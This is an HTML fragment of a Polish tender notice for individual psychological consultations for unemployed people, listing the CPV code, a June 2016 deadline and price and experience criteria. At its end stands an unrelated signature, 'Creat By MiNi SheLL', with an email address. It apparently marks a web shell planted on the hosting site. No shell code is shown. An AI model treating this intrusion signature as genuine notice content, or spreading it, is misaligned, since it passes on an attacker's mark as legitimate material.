- doświadczenie w prowadzeniu indywidualnych konsultacji psychologicznych dla osób bezrobotnych lub nieaktywnych zawodowo.
Pod uwagę brane będą następujące czynniki: cena za 1 godzinę zegarową konsultacji doświadczenie kadry prowadzącej konsultacje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie kadry - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com